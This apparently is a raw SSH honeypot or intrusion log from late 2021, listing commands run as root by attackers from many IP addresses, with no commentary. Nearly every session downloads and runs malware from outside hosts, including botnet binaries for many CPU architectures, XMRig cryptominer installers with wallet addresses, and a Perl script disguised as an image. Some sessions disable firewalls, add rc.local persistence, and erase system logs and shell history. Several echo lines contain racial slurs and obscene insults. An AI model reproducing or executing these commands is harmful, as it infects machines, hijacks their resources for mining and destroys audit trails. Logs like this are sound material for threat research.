Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 209.141.40.64 23-Oct-2021 12:18:01 ssh2 root
Exec wget hugecockinsideyourmom.store/x86_64; chmod 777 *; ./x86_64 drip_payload
wget hugecockinsideyourmom.store/x86_64
chmod 777 *
./x86_64 drip_payload

From 206.189.3.2 23-Oct-2021 13:01:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.208.197.236/0x83911d24Fx.sh; curl -O http://91.208.197.236/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 91.208.197.236  -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 91.208.197.236 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236  0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.208.197.236/0x83911d24Fx.sh
curl -O http://91.208.197.236/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 91.208.197.236 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 91.208.197.236
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 165.227.143.12 23-Oct-2021 22:24:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.208.197.236/0x83911d24Fx.sh; curl -O http://91.208.197.236/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 91.208.197.236  -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 91.208.197.236 ; chmod 777 0xtf2984767.sh; sh 0xtf2984767.sh; ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236  0xft6426467.sh 0xft6426467.sh; sh 0xft6426467.sh; rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.208.197.236/0x83911d24Fx.sh
curl -O http://91.208.197.236/0x83911d24Fx.sh
chmod 777 0x83911d24Fx.sh
sh 0x83911d24Fx.sh
tftp 91.208.197.236 -c get 0xt984767.sh
chmod 777 0xft6426467.sh
sh 0xft6426467.sh
tftp -r 0xtf2984767.sh -g 91.208.197.236
chmod 777 0xtf2984767.sh
sh 0xtf2984767.sh
ftpget -v -u anonymous -p anonymous -P 21 91.208.197.236 0xft6426467.sh 0xft6426467.sh
sh 0xft6426467.sh
rm -rf 0xt984767.sh 0xtf2984767.sh 0xft6426467.sh
rm -rf *

From 45.61.185.168 24-Oct-2021 01:04:59 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49fJJBi8TxsGB8KB4WCg2ZWNtQNCvAMB4HYkwS31HfVWJwvx5xQw3rpYx7M635ew5TZy4YK5HkLVoJCdE2X57LQiGfy6SgF
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 49fJJBi8TxsGB8KB4WCg2ZWNtQNCvAMB4HYkwS31HfVWJwvx5xQw3rpYx7M635ew5TZy4YK5HkLVoJCdE2X57LQiGfy6SgF

From 209.141.59.77 24-Oct-2021 14:11:17 ssh2 root
Exec wget hugecockinsideyourmom.store/x86_64; wget hugecockinsideyourmom.store/i686; wget hugecockinsideyourmom.store/arm; wget hugecockinsideyourmom.store/arc; wget hugecockinsideyourmom.store/arm5; wget hugecockinsideyourmom.store/arm6; wget hugecockinsideyourmom.store/arm7; wget hugecockinsideyourmom.store/i586; wget hugecockinsideyourmom.store/mips; wget hugecockinsideyourmom.store/mipsel; wget hugecockinsideyourmom.store/sh4; chmod 777 *; ./arc drip_payload; ./arm drip_payload; ./arm5 drip_payload; ./arm6 drip_payload; ./arm7 drip_payload; ./i586 drip_payload; ./i686 drip_payload; ./mips drip_payload; ./mipsel drip_payload; ./sh4 drip_payload; ./x86_64 drip_payload;
wget hugecockinsideyourmom.store/x86_64
wget hugecockinsideyourmom.store/i686
wget hugecockinsideyourmom.store/arm
wget hugecockinsideyourmom.store/arc
wget hugecockinsideyourmom.store/arm5
wget hugecockinsideyourmom.store/arm6
wget hugecockinsideyourmom.store/arm7
wget hugecockinsideyourmom.store/i586
wget hugecockinsideyourmom.store/mips
wget hugecockinsideyourmom.store/mipsel
wget hugecockinsideyourmom.store/sh4
chmod 777 *
./arc drip_payload
./arm drip_payload
./arm5 drip_payload
./arm6 drip_payload
./arm7 drip_payload
./i586 drip_payload
./i686 drip_payload
./mips drip_payload
./mipsel drip_payload
./sh4 drip_payload
./x86_64 drip_payload

From 195.133.18.116 24-Oct-2021 16:05:40 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://195.133.18.116/lewdbins.sh; chmod 777 lewdbins.sh; sh lewdbins.sh; tftp 195.133.18.116 -c get lewdtftp1.sh; chmod 777 lewdtftp1.sh; sh lewdtftp1.sh; tftp -r lewdtftp2.sh -g 195.133.18.116; chmod 777 lewdtftp2.sh; sh lewdtftp2.sh; rm -rf lewdbins.sh lewdtftp1.sh lewdtftp2.sh; rm -rf *
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://195.133.18.116/lewdbins.sh
chmod 777 lewdbins.sh
sh lewdbins.sh
tftp 195.133.18.116 -c get lewdtftp1.sh
chmod 777 lewdtftp1.sh
sh lewdtftp1.sh
tftp -r lewdtftp2.sh -g 195.133.18.116
chmod 777 lewdtftp2.sh
sh lewdtftp2.sh
rm -rf lewdbins.sh lewdtftp1.sh lewdtftp2.sh
rm -rf *

From 205.185.119.4 25-Oct-2021 16:07:11 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 154.28.2.4 25-Oct-2021 20:30:23 ssh2 root
w
ps a-eaf
ps a-ef
ps a-ef
ps a-ef
ps -aef
ls -a /ho
ls -a /home
unset HISTFILE
unset HISTSAVE
unset HISTZONE
unset HISTORY
history -c
wget 185.51.10.233/mig
chmod 755 mig
./mig -u root
rm -rf mig
cat .bash_history
w
MUIE MA-TII
ip a|grep glo

From 205.185.119.4 26-Oct-2021 05:45:12 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 179.43.175.26 26-Oct-2021 07:54:42 ssh2 root
Exec pkill ip; pkill xmrig; pkill Opera; pkill x86; pkill docker; pkill java; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
pkill ip
pkill xmrig
pkill Opera
pkill x86
pkill docker
pkill java
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 205.185.120.183 26-Oct-2021 11:42:06 ssh2 root
Exec wget 194.85.249.85/x86_64; wget 194.85.249.85/i686; wget 194.85.249.85/arm; wget 194.85.249.85/arc; wget 194.85.249.85/arm5; wget 194.85.249.85/arm6; wget 194.85.249.85/arm7; wget 194.85.249.85/i586; wget 194.85.249.85/mips; wget 194.85.249.85/mipsel; wget 194.85.249.85/sh4; chmod 777 *; ./arc drip_payload; ./arm drip_payload; ./arm5 drip_payload; ./arm6 drip_payload; ./arm7 drip_payload; ./i586 drip_payload; ./i686 drip_payload; ./mips drip_payload; ./mipsel drip_payload; ./sh4 drip_payload; ./x86_64 drip_payload;
wget 194.85.249.85/x86_64
wget 194.85.249.85/i686
wget 194.85.249.85/arm
wget 194.85.249.85/arc
wget 194.85.249.85/arm5
wget 194.85.249.85/arm6
wget 194.85.249.85/arm7
wget 194.85.249.85/i586
wget 194.85.249.85/mips
wget 194.85.249.85/mipsel
wget 194.85.249.85/sh4
chmod 777 *
./arc drip_payload
./arm drip_payload
./arm5 drip_payload
./arm6 drip_payload
./arm7 drip_payload
./i586 drip_payload
./i686 drip_payload
./mips drip_payload
./mipsel drip_payload
./sh4 drip_payload
./x86_64 drip_payload

From 209.141.36.13 26-Oct-2021 16:29:33 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://205.185.119.35/x86_64; chmod 777 *; ./x86_64 x86; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://205.185.119.35/x86_64
chmod 777 *
./x86_64 x86
echo hraztalag on top niggers, Molov is a fag

From 45.61.185.168 27-Oct-2021 09:13:17 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s

From 209.141.59.184 27-Oct-2021 10:14:03 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill x86_64; pkill x86; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill x86_64
pkill x86
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 179.43.175.26 27-Oct-2021 16:39:25 ssh2 root
Exec pkill ip; pkill xmrig; pkill Opera; pkill x86; pkill docker; pkill java; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
pkill ip
pkill xmrig
pkill Opera
pkill x86
pkill docker
pkill java
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 209.141.42.29 28-Oct-2021 05:45:14 ssh2 root
Exec cd /tmp; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 giftsfromthegod
cd /tmp
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
chmod 777 *
./x86_64 giftsfromthegod

From 209.141.33.121 28-Oct-2021 23:40:12 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 198.98.54.17 29-Oct-2021 14:25:30 ssh2 root
Exec wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 180.215.108.229 30-Oct-2021 03:18:22 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.203.28:8003/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.203.28:8003/TI
chmod 777 TI
./TI
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.203.28:8003/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://111.67.203.28:8003/TI
chmod 777 TI
./TI

From 180.215.108.229 30-Oct-2021 03:52:00 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 180.215.108.229 30-Oct-2021 04:54:47 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.49.248/sora.sh; curl -O http://209.141.49.248/sora.sh; chmod 777 sora.sh; sh sora.sh; tftp 209.141.49.248 -c get sora.sh; chmod 777 sora.sh; sh sora.sh; tftp -r sora2.sh -g 209.141.49.248; chmod 777 sora2.sh; sh sora2.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh; sh sora1.sh; rm -rf sora.sh sora.sh sora2.sh sora1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://209.141.49.248/sora.sh
curl -O http://209.141.49.248/sora.sh
chmod 777 sora.sh
sh sora.sh
tftp 209.141.49.248 -c get sora.sh
chmod 777 sora.sh
sh sora.sh
tftp -r sora2.sh -g 209.141.49.248
chmod 777 sora2.sh
sh sora2.sh
ftpget -v -u anonymous -p anonymous -P 21 209.141.49.248 sora1.sh sora1.sh
sh sora1.sh
rm -rf sora.sh sora.sh sora2.sh sora1.sh
rm -rf *

From 205.185.126.71 30-Oct-2021 12:21:39 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43FfsvebfiL9x6uHd7nc1RfLBDp8ASCfgiNLUfQxV8GtJVqdcX4brm3MiYcm2zgVRmbZoYPdn5YzgDG6ZMbRmq4x2nK337X

From 176.111.173.218 30-Oct-2021 12:24:20 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r 
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

From 154.28.2.4 30-Oct-2021 16:29:28 ssh2 root
w
curl ipv4.icanhazip.com
apt
wget
apt install curl
apt install curl install curl curl|| install curl install curl curl|| curl install curl curl||l install curl install curl curl|| install curl install curl curl|| curl install curl curl||l curl install
curl ipv4.icanhazip.com
wget
wget -qO - ipv4.icanhazip.com
ls -a /ho
ls -a /home
ls -a
pwd
cat .bash_history
cat network.pl
w
ip a|grep glo
last -20
cat /et hosts
cat /etc/hosts
w
nproc

From 157.230.104.41 30-Oct-2021 18:21:24 ssh2 root
Exec w
w

From 209.141.33.121 31-Oct-2021 01:45:15 ssh2 root
Exec cd /tmp; rm -rf *; pkill xms; pkill cnrig; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; busybox wget http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 rootsbabe
cd /tmp
rm -rf *
pkill xms
pkill cnrig
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
busybox wget http://188.213.49.155/x86_64
chmod 777 *
./x86_64 rootsbabe

From 211.22.65.18 31-Oct-2021 10:37:14 ssh2 root
Exec uname -a;wget ftp://cpa:cpa@5.45.119.175/znoki.jpg ; perl znoki.jpg ; rm -rf zn* ; history -c
uname -a
wget ftp://cpa:cpa@5.45.119.175/znoki.jpg
perl znoki.jpg
rm -rf zn*
history -c

From 198.98.62.96 31-Oct-2021 18:09:59 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://198.98.62.92/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://198.98.62.92/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 199.195.254.63 31-Oct-2021 19:21:42 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://198.98.62.92/x86_64; chmod 777 *; ./x86_64 x86xhed; echo hraztalag on top niggers, Molov is a fag
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://198.98.62.92/x86_64
chmod 777 *
./x86_64 x86xhed
echo hraztalag on top niggers, Molov is a fag

From 209.141.42.29 1-Nov-2021 14:16:39 ssh2 root
Exec cd /tmp; wget http://188.213.49.155/x86_64; curl -O http://188.213.49.155/x86_64; chmod 777 *; ./x86_64 giftsfromthegod
cd /tmp
wget http://188.213.49.155/x86_64
curl -O http://188.213.49.155/x86_64
chmod 777 *
./x86_64 giftsfromthegod

From 107.189.30.134 1-Nov-2021 21:33:05 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64

From 205.185.126.71 2-Nov-2021 07:53:02 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64; curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s

From 119.28.142.230 2-Nov-2021 12:01:33 ssh2 root
bt

From 205.185.115.39 2-Nov-2021 12:14:10 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like ( goofy ) 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like ( goofy )

From 104.194.219.85 2-Nov-2021 18:38:56 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like goofy  
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 222.186.133.167 3-Nov-2021 02:05:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8999/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8999/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.167:8999/wsnbb;chmod 777 wsnbb;./wsnbb;echo "cd /tmp/">>/etc/rc.local;echo "./wsnbb&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.167:8999/wsnbb
chmod 777 wsnbb
./wsnbb
echo "cd /tmp/">>/etc/rc.local
echo "./wsnbb
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 180.215.108.229 3-Nov-2021 03:10:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI

From 199.19.224.231 3-Nov-2021 08:08:29 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like  goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 176.111.173.218 3-Nov-2021 21:21:07 ssh2 root
Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ;  touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r 
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
rm -rf /var/log/wtmp
rm -rf /var/log/lastlog
rm -rf /var/log/secure
rm -rf /var/log/xferlog
rm -rf /var/log/messages
rm -rf /var/run/utmp
touch /var/run/utmp
touch /var/log/messages
touch /var/log/wtmp
touch /var/log/messages
touch /var/log/xferlog
touch /var/log/secure
touch /var/log/lastlog
rm -rf /var/log/maillog
touch /var/log/maillog
rm -rf /root/.bash_history
touch /root/.bash_history
history -r

From 199.19.224.231 4-Nov-2021 01:32:09 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like  goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 198.98.54.17 4-Nov-2021 06:01:09 ssh2 root
Exec wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh; chmod 777 *; ./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
busybox wget http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
chmod 777 *
./setup_c3pool_miner.sh 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 178.18.243.61 4-Nov-2021 07:37:10 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2

From 192.3.141.175 4-Nov-2021 13:55:42 ssh2 root
w
halt

